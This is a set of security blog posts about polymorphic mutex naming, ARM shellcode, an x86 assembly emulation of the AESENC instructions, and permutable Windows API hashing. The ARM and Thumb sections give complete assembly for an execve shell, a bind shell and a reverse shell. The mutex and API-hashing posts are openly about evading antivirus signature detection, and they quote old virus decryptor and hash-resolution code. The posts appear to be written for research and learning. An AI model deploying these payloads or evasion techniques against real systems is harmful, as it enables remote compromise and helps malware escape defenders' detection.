  • Use a stream or block cipher with unique key to encrypt a message, can later be decrypted using same key.

  • Message Authentication Code (MAC)
  • Use a cryptographic primitive and unique key to derive hash of string. Hash can be verified using same message and key.

  • Pseudo Random Number Generator (PRNG)
  • Seed RNG using hash of unique information obtained from operating system.
    Use byte stream to obfuscate a message.

  • Asymmetric Encryption
  • Use a digital signature algorithm such as ElGamal or DSA.

Although all of the above can be used or misused to generate polymorphic mutex names, using a KDF seemed sufficient.

If we use entropy, this must be included in the name, otherwise we cannot verify ownership of the named object later when performing detection.

You can think of the mutex name as being a password if we use a KDF, and a nonce/salt being the entropy.

Mutex Name Generation

For illustration purposes, I’m using the permutation function of SipHash for a 64-bit hash function.

void permute(w128_t *state, int cnt) {
  uint32_t *s=(uint32_t*)&state->w[0];
  int      i;
  
  for (i=0; i<cnt; i++) {
    s[0] += s[1]; 
    s[1]=ROTL32(s[1], 5); 
    s[1] ^= s[0]; 
    s[0]=ROTL32(s[0],16); 
    s[2] += s[3]; 
    s[3]=ROTL32(s[3], 8); 
    s[3] ^= s[2]; 
    s[0] += s[3]; 
    s[3]=ROTL32(s[3],13); 
    s[3] ^= s[0]; 
    s[2] += s[1]; 
    s[1]=ROTL32(s[1], 7); 
    s[1] ^= s[2]; 
    s[2]=ROTL32(s[2],16); 
  }
}
    
uint64_t Hexe(void *in, size_t len, uint64_t nonce)
{
    w128_t s;
    int    idx, i;
    uint8_t *p=(uint8_t*)in;
    w64_t   *seed=(w64_t*)&nonce;
    
    // zero initialize
    memset(s.b, 0, sizeof(s));

    // set 64-bit seed
    s.w[1] = seed->w[0];
    s.w[3] = seed->w[1];
    
    // absorb data
    while (len) {
      idx = MIN(len, HEXE_BLOCK_LEN);
      
      for (i=0; i<idx; i++) {
        s.b[i] ^= p[i];
      }
      
      p += idx;
      len -= idx;
      
      permute(&s, 2);
    }
    // add padding
    s.b[idx] ^= 0x1F;
    s.b[3]   ^= 0x80;
    
    // permute last time
    permute(&s, 4);
    
    // return 64-bit hash
    return s.q[0];
}

The 1st 32-bits highlighted in red are the nonce/seed value provided to Hexe with mutex name. The remaining 64-bits are returned by Hexe.

Validation is simply using the same mutex name and nonce/seed value to derive a hash which is then compared with the mutex name enumerated from system.

Additional steps

Since a lot of unique mutex names are derived from a GUID function such as CoCreateGUID() we can take things a step further and increase the length of nonce to 64-bits. This along with 64-bit hash can be converted to a GUID string.

int main(int argc, char *argv[])
{
    w128_t  s, r;
    OLECHAR *guid_str;
    
    if (argc!=2) {
      printf ("usage: hexe_hash <string>\n");
      return 0;
    }
    
    // doesn't matter about source of seed value
    srand(time(0));
    
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    
    // derive hash of input string
    s.q[1] = Hexe(argv[1], strlen(argv[1]), &s);
    
    wprintf(L"Hexe Hash : %016llX%016llX\n", s.q[0], s.q[1]);
    
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    wprintf(L"GUID      : %s\n", guid_str);
    
    // convert to binary
    CLSIDFromString(guid_str, (GUID*)&r);
    
    wprintf(L"Hexe Hash : %016llX%016llX\n", r.q[0], r.q[1]);
    
    CoTaskMemFree(guid_str);
    return 0;  
}

As you can see, it looks exactly like a regular GUID now except it can also be verified using the same algorithm that generated it.

All that remains now is how to find and validate poly mutex names.

Enumerating Mutexes

We enumerate handles (file descriptors on linux) for each process of the local computer. Filter by type Mutant, filter those with no name, then attempt verification of each name.

BOOL IsRunning(PWCHAR mutex_name)
{
    pNtQuerySystemInformation  NtQuerySystemInformation;
    pNtQueryObject             NtQueryObject;

    w128_t                     r;
    PWCHAR                     p;
    HRESULT                    hr;
    ULONGLONG                  hash;
    ULONG                      len=0, total=0;
    NTSTATUS                   status;
    LPVOID                     list=NULL;
    DWORD                      i;
    HANDLE                     hProcess, hObject;
    OBJECT_BASIC_INFORMATION   obi;
    POBJECT_TYPE_INFORMATION   t;
    POBJECT_NAME_INFORMATION   n;

    PSYSTEM_HANDLE_INFORMATION h;
    BOOL                       bRunning=FALSE;
    size_t                     mutex_len;

    NtQuerySystemInformation =
        (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");

    NtQueryObject =
        (pNtQueryObject)GetProcAddress(
        GetModuleHandle(L"ntdll"), "NtQueryObject");

    if (!NtQuerySystemInformation ||
        !NtQueryObject) {
      // we couldn't resolve API address
      return FALSE;
    }

    SetPrivilege(SE_DEBUG_NAME, TRUE);

    list = xmalloc(2048);

    do {
      len += 2048;
      list = xrealloc (list, len);

      if (list==NULL) {
        // we couldn't reallocate memory
        break;
      }
      status = NtQuerySystemInformation(SystemHandleInformation,
          list, len, &total);

    } while (status == STATUS_INFO_LEN_MISMATCH);

    if (!NT_SUCCESS(status)) {
      // we were unable to obtain list of process
      xfree(list);
      return FALSE;
    }

    h = (PSYSTEM_HANDLE_INFORMATION)list;
    mutex_len = lstrlen(mutex_name);

    // for each handle
    for (i=0; i<h->HandleCount && !bRunning; i++)
    {
      // skip system
      if (h->Handles[i].ProcessId == 4) continue;

      // open the process
      hProcess = OpenProcess(PROCESS_DUP_HANDLE,
         FALSE, h->Handles[i].ProcessId);

      if (hProcess != NULL)
      {
        // try duplicate handle
        status = DuplicateHandle(hProcess,
            (HANDLE)h->Handles[i].Handle, GetCurrentProcess(),
            &hObject, 0, FALSE, DUPLICATE_SAME_ACCESS);

        if (status)
        {
          // query basic info
          status = NtQueryObject(hObject,
              ObjectBasicInformation, &obi, sizeof(obi), &len);

          if (NT_SUCCESS(status))
          {
            // skip object if there's no name
            if (obi.NameInformationLength !=0)
            {
              // query the type
              len = obi.TypeInformationLength + 2;
              t = (POBJECT_TYPE_INFORMATION)xmalloc(len);

              if (t != NULL) {
                status = NtQueryObject(hObject,
                    ObjectTypeInformation, t, len, &len);

                if (NT_SUCCESS(status)) {
                  // skip object if it isn't a mutant
                  if (lstrcmpi(t->Name.Buffer, L"Mutant")!=0) {
                    xfree(t);
                    continue;
                  }
                }
                xfree(t);
              }

              // query the name
              len = obi.NameInformationLength + 2;
              n = (POBJECT_NAME_INFORMATION)xmalloc(len);

              if (n != NULL) {
                status = NtQueryObject(hObject,
                    ObjectNameInformation, n, len, &len);

                if (NT_SUCCESS(status)) {
                  // obtain the absolute name
                  p = wcsrchr(n->Name.Buffer, L'\\');
                  if (p != NULL) {
                    p += 1;
                    // attempt conversion to binary
                    hr = CLSIDFromString((OLECHAR*)p, 
                        (GUID*)&r);
                        
                    if (hr == NOERROR) {
                      // generate hash using seed
                   hash = Hexe(mutex_name, 
                       mutex_len*2, r.q[0]);
                       
                      // do we have a match?
                      if (hash == r.q[1]) {
                        // we found poly mutex
                        bRunning=TRUE;
                      }
                    }
                  }
                }
                xfree(n);
              }
            }
          }
          // close object
          CloseHandle(hObject);
        }
        // close process
        CloseHandle(hProcess);
      }
    }
    xfree(list);
    return bRunning;
}

An example of output from handle.c

Demonstration

//
    PWCHAR  mutex_name = L"com_mycompany_apps_appname";
    BOOL    bRunning; 
    w128_t  s, r;
    OLECHAR *guid_str;
    HANDLE  hMutex;
    
    // already running?
    bRunning = IsRunning(mutex_name); 
    
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
   
    // if not running, create it
    // doesn't matter about source of seed value
    srand(time(0));
    
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    
    // derive hash of input string
    s.q[1] = Hexe(mutex_name, lstrlen(mutex_name)*2, s.q[0]);
    
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    
    wprintf(L"Creating: %s for %s\n", guid_str, mutex_name);
    
    // create
    hMutex = CreateMutex(NULL, TRUE, guid_str);
    if (ERROR_ALREADY_EXISTS == GetLastError()) {
      wprintf (L"already exists!\n");
      return 0;
    }
    // already running?
    bRunning = IsRunning(mutex_name); 
    
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
    
    // close mutex 
    wprintf (L"Closing : %s\n", mutex_name);
    CloseHandle(hMutex);

    // already running?
    bRunning = IsRunning(mutex_name); 
    
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");

Although the above example uses a hardcoded string, the MachineGUID value could also be used.

Summary

While something like this can be used for malicious purposes, defensive applications need to evade detection too.

Ideally, generation of mutex names should be created by the kernel using digital signatures, but since there is no demand for such a feature, we’re unlikely to see it implemented.

@yassine_lemmou pointed out to me that if 2 or more applications run at the same time, this would result in multiple instances running.

source

Posted in cryptography, programming, windows | Tagged , , , , | Leave a comment

Shellcode: Linux ARM (AArch64)

Introduction

I’ve no idea how useful these will be since they were only tested on Linux Ubuntu. They were more or less derived from 32-bit codes shown here, except there’s no attempt at all to eliminate null bytes, and there are obviously different registers being used.

CPU parameters system call
32 r0-r6 r7
64 x0-x7 x8
  • Registers r0-r6 on AArch32 are used for system call parameters while registers x0-x7 on AArch64 are used.
  • Register r7 on AArch32 is used for the system call number while x8 is used on AArch64
  • Accessing the program counter (PC) directly on AArch64 is no longer possible, although relative instructions like ADR and LDR are, so perhaps there’s no need to.
  • You can no longer push/pop multiple registers which reminds of when AMD64 decided to abandon PUSHAD/POPAD.

Depending on your needs, these may require further modifcations. They all contain null bytes, so would require encoding or a complete rewrite to remove them. The following is the connect shell for example which contains many null bytes.

Execute /bin/sh

// 28 bytes
    .global _start
    .text

_start:
    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh         // x0 = "/bin/sh"
    eor    x1, x1, x1     // x1 = NULL
    eor    x2, x2, x2     // x2 = NULL
    mov    x8, #221       // x8 = execve
    svc    0
sh:    
    .ascii "/bin/sh\0"

Bind /bin/sh to TCP port

// 136 bytes
    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2   // x2 = IPPROTO_IP
    mov    x1, #1       // x1 = SOCK_STREAM
    mov    x0, #2       // x0 = AF_INET
    mov    x8, #198     // x8 = socket
    svc    0
    
    mov    x6, x0       // x6 = s
    
    // bind(s, &sa, sizeof(sa));  
    mov    x2, #16      // x2 = sizeof(sa)
    adr    x1, sin_port // x1 = &sa
    mov    x8, #200     // x8 = bind
    svc    0
  
    // listen(s, 0);
    eor    x1, x1, x1   // x1 = 0    
    mov    x0, x6       // x0 = s
    mov    x8, #201     // x8 = listen 
    svc    0    
    
    // r = accept(s, 0, 0);
    eor    x1, x1, x1
    eor    x2, x2, x2
    mov    x0, x6        // x0 = s
    mov    x8, #202      // x8 = accept    
    svc    0    
    
    mov    x6, x0        // x6 = r
    
    // dup2(r, FILENO_STDIN);
    // dup2(r, FILENO_STDOUT);
    // dup2(r, FILENO_STDERR);
    mov    x1, #2        // for 3 descriptors
dup_loop:
    mov    x0, x6        // x0 = r
    mov    x8, #24       // x8 = dup2 
    svc    0
    subs   x1, x1, #1    // subtract one
    bpl    dup_loop

    // execve("/bin/sh", NULL, NULL);    
    eor    x1, x1, x1
    adr    x0, sh        // x0 = "/bin/sh" 
    mov    x8, #221      // x8 = execve
    svc    0
sin_port:    
    .word  0xd2040002    // 1234, AF_INET
    .word  0x00000000    // INADDR_ANY
sh:    
    .ascii "/bin/sh\0"

Reverse connect to port and spawn /bin/sh

// 104 bytes
    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2  // x2 = IPPROTO_IP
    mov    x1, #1      // x1 = SOCK_STREAM
    mov    x0, #2      // x0 = AF_INET
    mov    x8, #198    // x8 = socket 
    svc    0
  
    // connect(s, &sa, sizeof(sa));
    mov    x6, x0       // x6 = s
    adr    x1, sin_port // x1 = sa.sin_port
    mov    x2, #16      // x2 = sizeof(sa)
    mov    x8, #203     // x8 = connect
    svc    0
  
    // dup2(s, FILENO_STDIN);
    // dup2(s, FILENO_STDOUT);
    // dup2(s, FILENO_STDERR);
    mov    x1, #2        // for 3 descriptors
dup_loop:
    eor    x2, x2, x2    // x2 = 0
    mov    x0, x6        // x0 = s
    mov    x8, #24       // x8 = dup2 
    svc    0
    subs   x1, x1, #1    // subtract 1
    bpl    dup_loop

    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh        // x0 = "/bin/sh" 
    eor    x2, x2, x2    // x2 = NULL
    eor    x1, x1, x1    // x1 = NULL  
    mov    x8, #221      // x8 = execve
    svc    0
sin_port:    
    .word  0xd2040002    // 1234, AF_INET
sin_addr:
    .word  0x0100007f    // 127.0.0.1
sh:  
    .ascii "/bin/sh\0"

View sources here

Posted in arm, assembly, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Linux ARM Thumb mode

Introduction

Just a quick post about some shellcodes for a raspberry pi 3 I purchased recently to learn ARM assembly.

For those interested in developing your own, you can find a full list of Linux system calls in Thumb mode here

These examples are only intended for 32-bit Linux. BSD or other OS that run on RPI3 will most likely use completely different system call numbers.

Some of you might find these 32-bit codes with comments useful as a reference if nothing else. I’ll discuss 64-bit codes in later post.

Assembling

If you want to assemble these codes on raspberry pi, you can use the GNU Assembler which should already be installed.

I use runsc to test out the codes.

Thumb mode

Raspbian by default runs in ARM mode, but the architecture has support for several modes, one of which is Thumb. Thumb uses 16-bit opcodes which allows our final shellcodes to be more compact. You’ll see the following used for each code.

// 8 bytes
    .global _start
    .text

_start:
    // switch to thumb mode
    .code 32
    add    r3, pc, #1
    bx     r3

Execute /bin/sh

The Load Relative Register (LDR) instruction initializes the /bin//sh string from 32-bit mode before switching to thumb mode.

// 36 bytes
    
    .arch armv6
    .global _start
    .text

_start:
    .code 32
    ldr    r0, =#0x6e69622f // /bin
    ldr    r1, =#0x68732f2f // //sh

    // switch to thumb mode
    add    r2, pc, #1
    bx     r2
    
    .code 16
    // execve("/bin/sh", NULL, NULL);
    eor    r2, r2, r2     // r2 = NULL    
    push   {r0, r1, r2}   // save string + null bytes
    mov    r0, sp         // r0 = "/bin//sh", 0
    eor    r1, r1, r1     // r1 = NULL
    mov    r7, #11        // r7 = execve
    svc    1

Bind Shell

// 104 bytes
    
    .arch armv6
    .global _start
    .text

_start:
    .code 32
    ldr    r4, =#0xD402FF02 // htons(1234), AF_INET
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh
    
    // switch to thumb mode
    add    r3, pc, #1
    bx     r3 
  
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2   // r2 = IPPROTO_IP
    mov    r1, #1       // r1 = SOCK_STREAM
    lsl    r7, r1, #8   // r7 = 1*256
    add    r7, #25      // r7 = 281 = socket 
    mov    r0, #2       // r0 = AF_INET
    svc    1
    
    mov    r8, r0       // r8 = s
    
    // bind(s, &sa, sizeof(sa)); 
    mov    r1, r4 
    push   {r1, r2}     // save sa on stack
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in sa.family 
    mov    r2, #16      // sizeof(sa) 
    add    r7, #1       // r7 = 281+1 = 282 = bind
    svc    1
  
    // listen(s, 1);
    mov    r1, #1       // r1 = 1    
    mov    r0, r8       // r0 = s
    add    r7, #2       // r7 = 282+2 = 284 = listen 
    svc    1    
    
    // r = accept(s, 0, 0);
    eor    r2, r2, r2   // r2 = 0
    eor    r1, r1, r1   // r1 = 0
    mov    r0, r8       // r0 = s
    add    r7, #1       // r7 = 284+1 = 285 = accept    
    svc    1    
    
    mov    r8, r0       // r8 = r
    
    // dup2(r, FILENO_STDIN);
    // dup2(r, FILENO_STDOUT);
    // dup2(r, FILENO_STDERR);
    mov    r1, #3       // for 3 descriptors
c_dup:
    mov    r7, #63      // r7 = dup2 
    mov    r0, r8       // r0 = r
    sub    r1, #1 
    svc    1
    bne    c_dup        // while (r1 != 0)

    // execve("/bin/sh", NULL, NULL);
    mov    r7, r2 
    push   {r5, r6, r7}    
    mov    r0, sp       // r0 = "/bin/sh" 
    mov    r7, #11      // r7 = execve
    svc    1
    nop

Reverse Connect

Default sockaddr_in values are : 127.0.0.1, 1234, AF_INET

// 92 bytes
    
    .arch armv6
    .global _start
    .text

_start:

    .code 32
    ldr    r3, =#0xD402FF02 // htons(1234), AF_INET
    ldr    r4, =#0x0100007f // 127.0.0.1
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh

    // switch to thumb mode    
    add    r0, pc, #1
    bx     r0 
  
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2  // r2 = IPPROTO_IP
    mov    r1, #1      // r1 = SOCK_STREAM
    mov    r0, #2      // r0 = AF_INET
    lsl    r7, r1, #8  // multiply by 256
    add    r7, #25     // 256+25 = socket
    svc    1

    mov    r8, r0       // r8 = s
    
    // connect(s, &sa, sizeof(sa));
    push   {r3, r4}     // save sa on stack
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in sa.family
    mov    r2, #16      // r2 = sizeof(sa)
    add    r7, #2       // r7 = 281+2 = connect
    svc    1
  
    // dup2(s, FILENO_STDIN);
    // dup2(s, FILENO_STDOUT);
    // dup2(s, FILENO_STDERR);
    mov    r1, #3      // for 3 descriptors
c_dup:
    mov    r7, #63     // r7 = dup 
    mov    r0, r8      // r0 = s
    sub    r1, #1      // decrease r1    
    svc    1
    bne    c_dup       // while (r1 != 0)

    // execve("/bin/sh", NULL, NULL);
    eor    r2, r2, r2 
    mov    r7, r2
    push   {r5, r6, r7}
    mov    r0, sp  
    mov    r7, #11       // r7 = execve
    svc    1
    nop                  // alignment by 4 bytes

view sources here

Posted in arm, assembly, pi, raspberry, security, shellcode | Tagged , , , , , | 1 Comment

Emulation of AESENC and AESENCLAST instructions in x86 assembly

Introduction

aesenc and aesenclast are AES-NI instructions impelemented on the x86 architecture.

Recently, a well known cryptographer J.P Aumasson published code to emulate these instructions in C, which would be very useful for emulators, and virtual machines in general.

The combination of ShiftRows and SubBytes in one line inspired me to write an implementation in x86 assembly.

The following code is not optimized for speed nor does it counter against electromagnetic attacks.

Galois Multiplication

Used for the mix columns and substitution layers. Based on algorithm by Andreas Hoheisel.

uint32_t gf_mul2 (uint32_t w) {
    uint32_t t = w & 0x80808080;
    
    return ( (w ^ t ) << 1) ^ ( ( t >> 7) * 0x0000001B);
}

The assembly …

Sub Bytes

Derived from code here

uint8_t sub_byte (uint8_t x)
{
    uint8_t i, y=x, sb;

    if (x) {
      // calculate logarithm gen 3
      for (i=1, y=1; i != 0; i++) {
        y ^= gf_mul2(y);
        if (y == x) break;
      }
      x = ~i;
      // calculate anti-logarithm gen 3
      for (i=0, y=1; i<x; i++) {
        y ^= gf_mul2(y);
      }
    }

    sb = y;
    
    for (i=0; i<4; i++) {
      y   = ROTL8(y, 1);
      sb ^= y;
    }
    return sb ^ 0x63;
}

The assembly code, but bear in mind, it has no countermeasures to side channel attacks.

; *****************************   
; uint8_t sub_byte (uint8_t x)
; *****************************       
sub_byte:
    pushad
    test   al, al            ; if (x)
    xchg   eax, edx          ; y = x    
    jz     sb_l2
    ; calculate logarithm gen 3
    mov    bh, 1             ; i = 1
    mov    bl, 1             ; y = 1
sb_l0:    
    mov    al, bl            ; y ^= gf_mul2(y)
    call   gf_mul2
    xor    bl, al       
    cmp    bl, dl            ; if (y == x) break;
    jz     sb_lx
    inc    bh                ; i++
    jnz    sb_l0             ; i != 0
sb_lx:        
    ; calculate anti-logarithm gen 3
    xor    bl, bl            ; i = 0
    mov    dl, 1             ; y = 1
    xor    bh, -1            ; x = ~i (bitwise NOT doesn't affect ZF)
    jz     sb_l2    
sb_l1:
    mov    al, dl            ; al = y
    call   gf_mul2
    xor    dl, al            ; y ^= gf_mul2(y)
    inc    bl                ; i++
    cmp    bl, bh            ; i < x 
    jnz    sb_l1             ; 
sb_l2:
    mov    al, dl            ; if before sb_l0, dl is already zero
    mov    cl, 4             ; loop 4 times
sb_l3:
    rol    dl, 1             ; y = ROTL8(y, 1);
    xor    al, dl            ; sb ^= y;
    loop   sb_l3 
    xor    al, 0x63          ; sb ^= 0x63
    mov    [esp+1ch], al    
    popad
    ret

AESENC / AESCLAST

These 2 are combined by using a parameter last
Simply set last to zero or one.

void aesenc (void *state, void *key, int last) {
    w128_t  *s, *k, v;
    uint32_t i, w;
    
    s=(w128_t*)state;
    k=(w128_t*)key;

    // sub bytes and shift rows
    for (i=0; i<16; i++) {    
      v.b[((((i >> 2) + 4 - (i & 3) ) & 3) * 4) + (i & 3)] = sub_byte(s->b[i]);
    }
    
    // if not last round
    if (!last) {
      // mix columns
      for (i=0; i<4; i++) {
        w = v.w[i];
        v.w[i] = ROTR32(w,  8) ^ 
                 ROTR32(w, 16) ^ 
                 ROTL32(w,  8) ^ 
                 XT(ROTR32(w, 8) ^ w);
      }
    }
    // add round key
    for (i=0; i<4; i++) {
      s->w[i] = v.w[i] ^ k->w[i];
    }
}

The x86 assembly code..

; **********************************   
; uint8_t aesenc (void *s, void *rk)
; **********************************       
_aesencx:
    pushad
    xor    ecx, ecx          ; i = 0     
    lea    esi, [esp+32+4]
    lodsd
    push   eax               ; save state
    lodsd                    
    xchg   eax, ebx          ; ebx = round key 
    lodsd                    ; eax = last
    pop    esi               ; esi = state   
    pushad                   ; v = alloc(32)
    mov    edi, esp          ; edi = v
    dec    eax               ; last--
    pushfd
subbytes_shiftrows:    
    mov    al, [esi+ecx]     ; al = sub_byte(s[i])
    call   sub_byte
    mov    edx, ecx          ; edx = i
    mov    ebp, ecx          ; ebp = i
    shr    ebp, 2            ; ebp >>= 2
    and    edx, 3            ; edx &= 3
    sub    ebp, edx          ; ebp -= edx
    and    ebp, 3            ; ebp &= 3
    lea    edx, [edx+ebp*4]  ; edx = (edx + ebp * 4) 
    mov    [edi+edx], al     ; v.b[edx] = al
    inc    ecx               ; i++
    cmp    cl, 16            ; for (i=0; i<16; i++)
    jnz    subbytes_shiftrows
    popfd
    jz     add_round_key    
    pushad
    mov    cl, 4    
mix_columns:
    mov    ebx, [edi]        ; w0 = v.w[i]
    mov    eax, ebx          ; w1 = ROTR32(w0, 8)
    ror    eax, 8
    mov    esi, eax          ; w2 = ROTR32(w0, 8)
    xor    eax, ebx          ; w1 ^= w0 
    call   gf_mul2
    xor    esi, eax          ; w2 ^= gf_mul2(w1)
    ror    ebx, 16           ; w0 = ROTR32(w0, 16)
    xor    esi, ebx          ; w2 ^= w0
    ror    ebx, 8            ; w0 = ROTR32(w0, 8)
    xor    ebx, esi          ; w0 ^= w2
    xchg   ebx, eax          ; eax = w0
    stosd                    ; v.w[i] = eax
    loop   mix_columns
    popad
add_round_key:               ; for (i=0; i<16; i++) {
    mov    al, [edi]         ;   al = v.b[i] 
    xor    al, [ebx]         ;   al ^= rk[i]
    inc    ebx               ;   
    mov    [esi], al         ;   s[i] = al
    cmpsb                    ;   
    loop   add_round_key     ; }
    popad                    ; release memory
    popad                    ; restore registers
    ret

The size of assembly code is 195 bytes. Approximately 300 for C generated assembly.

See original code by Aumasson here

Posted in assembly, cryptography, encryption, security | Tagged , , , , , , , | Leave a comment

Shellcode: Windows API hashing with block ciphers ( Maru Hash )

Introduction

String/Pattern Matching Algorithms are by far the most popular and easy way to detect a shellcode. The principle is simple: all codes have unique characteristics which can be used as signatures to identify in memory.

Even shellcodes with no prior analysis can contain some known value, or piece of code which at least makes it appear suspicious, and worthy of closer inspection.

The known values I’m referring to are of course API strings and hashes which have always been useful in detecting malicious code for 20+ years.

If we’re going to develop more advanced shellcodes that go undetected by modern AV solutions, we need to consider using a HLL like C or C++ along with unconventional programming that guarantees everything in a shellcode is permutable.

It’s not just the executable code that should be permutable, but the entire thing; code, data, constants, strings..everything.

What I show here today is how to create permutable API hashes using a hash function called Maru (Ma-roo), named after the Japanese cat.

Maru uses a block cipher to generate a hash of string. You don’t have to use a block cipher for this, but a cryptographic primitive can help protect the hashes against collision attacks found using Satisfiability Modulo Theories (SMT).

For more information, read Using SAT and SMT to defeat simple hashing algorithms

Also, read the section on cryptography in Quick introduction into SAT/SMT solvers and symbolic execution

CryptoSMT

**WARNING: Maru is not a cryptographic hash, and should not be used for applications where a secure hash algorithm is required.**

Signature detection

When viruses for MS-DOS started to appear 30 years ago, detection by signature was relatively simple.

In an attempt to hide code, authors used a simple XOR operation with an 8-bit value. For example, the ‘Skism Rythem Stack Virus-808‘ from 1991 used milliseconds of the current time to “encrypt” each new infection, so it would appear differently for 100 versions.

This is the entry point of that code, and its “decryption” process.

jmp    virus_start

encrypt_val db 00h

virus_start:

    call   encrypt         ; encrypt/decrypt file
    jmp    virus           ; go to start of code

encrypt:

    push   cx
    mov    bx, offset virus_code ; start encryption at data

xor_loop:
    mov    ch, [bx]        ; read current byte
    xor    ch, encrypt_val ; get encryption key
    mov    [bx], ch        ; switch bytes
    inc    bx              ; move bx up a byte
    cmp    bx,  offset virus_code + virus_size
    ; are we done with the encryption
    
    jle    xor_loop        ; no? keep going
    pop    cx
    ret

Later in the code, the virus will update ‘encrypt_val’ using the milliseconds value of the current time.

;
    mov    ah, 2ch         ; get time
    int    21h

    mov    encrypt_val, dl ; save m_seconds to encrypt val so
                           ; theres 100 mutations possible

There’s some effort to hide the body of the virus here, but the decrypter is still visible and easily detected. Moreover, a scanner can emulate the decrypter routine, exposing the body of virus in memory before performing detection by signature.

When Win32 viruses started to appear in 1997, there were no longer MS-DOS interrupts. Instead there were API functions, accessible through dynamic libraries or DLL, and this made detecting malware even easier. Any code with a large block of API strings in it, was immediately going to raise alarm bells.

Authors eventually started to use 32-bit checksums, the most popular of which was CRC32. Later, LSD-PL inspired a trend of using some basic Add-Rotate-Xor routine, like the following that appeared in their WASM package.

i3: mov   esi,[4*eax+ebx]    ; ptr to symbol name
    add   esi,edx            ; rva2va

    push  ebx      ; hash: h=((h<<5)|(h>>27))+c
    push  eax
    xor   ebx,ebx
i4: xor   eax,eax  ; hash loop
    lodsb
    rol   ebx,5
    add   ebx,eax
    cmp   eax,0
    jnz   i4 
    ror   ebx,5 
    cmp   ebx,ecx  ; hash compare
    pop   eax
    pop   ebx
    je    i5       ; same: symbol found
    inc   eax
    jmp   i3       ; different: go to the next symbol

Most legitimate code doesn’t have to resolve an API by string or hash manually through Import Address Table (IAT) or Export Address Table (EAT) and if some code does behave this way, it’s usually up to no good.

What’s funny about API hashing; It was supposed to prevent signature detection of strings. So, instead of detecting by string, AV just detected the hash of an API string, which still makes it a perfectly valid signature.

Even the shellcodes generated by many popular payload tools (BeEF, Meterpreter, Veil) all use basic hashing algorithms with no entropy or randomization. They are consistently the same, thus are just as easy to detect as any API string itself.

Of course, these packages offer the ability to encrypt payloads with a stream or block cipher like RC4 or AES. Again though, even if it will pass a simple scan by AV or IDS, a more thorough analysis using an emulator can decrypt the main code and perform pattern matching afterwards, having no problem with detection.

Plain strings problem

Ideally, an attacker would want everything obfuscated/encrypted during compilation and decrypted at run-time without using additional tools or code.

constexpr is ideal for C++ code, but for C, there’s no such feature unless of course, a compiler can be modified to encrypt all strings at compile time?

Some assemblers such as MASM and NASM support macro based compilation, but are cumbersome to work with on complex functions. (not that you couldn’t)

Z0MBiE already discussed the problem of plain strings in Data Encoding In Meta Viruses and Solving Plain Strings Problem In HLL around 2002 which did somewhat “solve” the problem, but if you look closely at the sources, there’s insufficient entropy used.

At the time, he provided a library VirStr with TASM macros that worked with Borland’s C compiler, but these do not work with mingw, msvc or clang, and the library has never been updated since.

The purpose of using entropy for hashing of API strings is obviously to increase the difficulty of detecting a payload. It’s not enough to avoid detection forever, but it’s certainly better than existing hash algorithms with no entropy at all.

Hash function constructions

We can construct new hash algorithms from block ciphers, and these offer us the potential to use unique keys, thus generating completely different API hashes every time the key changes.

However, as you will see, very few block ciphers are suitable for lightweight applications such as shellcode.

Here are 3 potential constructions to use. (there are more, but only 3 are covered)

    • Davies–Meyer

H_i=E_{m_i}(H_{i-1})\oplus H_{i-1}

Feeds each block of the message (m_i) as the key to a block cipher. Feeds the previous hash value (H_{i-1}) as the plaintext to be encrypted.

The output ciphertext is then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Matyas–Meyer–Oseas

H_i=E_g{(H_{i-1})}(m_i)\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then also XORed with the same message block (m_i) to produce the next hash value (H_i). The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Miyaguchi–Preneel

H_i = E_{g(H_{i-1})}(m_i)\oplus H_{i-1}\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then XORed with the same message block (m_i) and then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

Choosing a block cipher

We know signature detections require some static value, and what better static values exist than cryptographic constants?

You can of course change them, but then it might affect security of the cipher. So, it’s better to choose a cipher that doesn’t use any constants, at all.

While looking at potential block ciphers, my top 3 were based on Add-Rotate-Xor (ARX) designs.

    • Speck

Designed by the NSA, and published in 2013. Wide range of key and block sizes for different architectures. Proven to be the smallest software based block cipher available for most architectures.

Parameters for x86: 64-bit block, 128-bit key. For x86-64: 128-bit block, 256-bit key. Both implemented in 64 and 86 bytes respectively.

Here’s the x86 code.

    • Chaskey-LTS

Designed and published in 2015. Uses an Even-Mansour design with permutation function of SipHash. 128-bit keys, 128-bit blocks. Can be implemented in approx. 90 bytes using x86 assembly.

    • XTEA

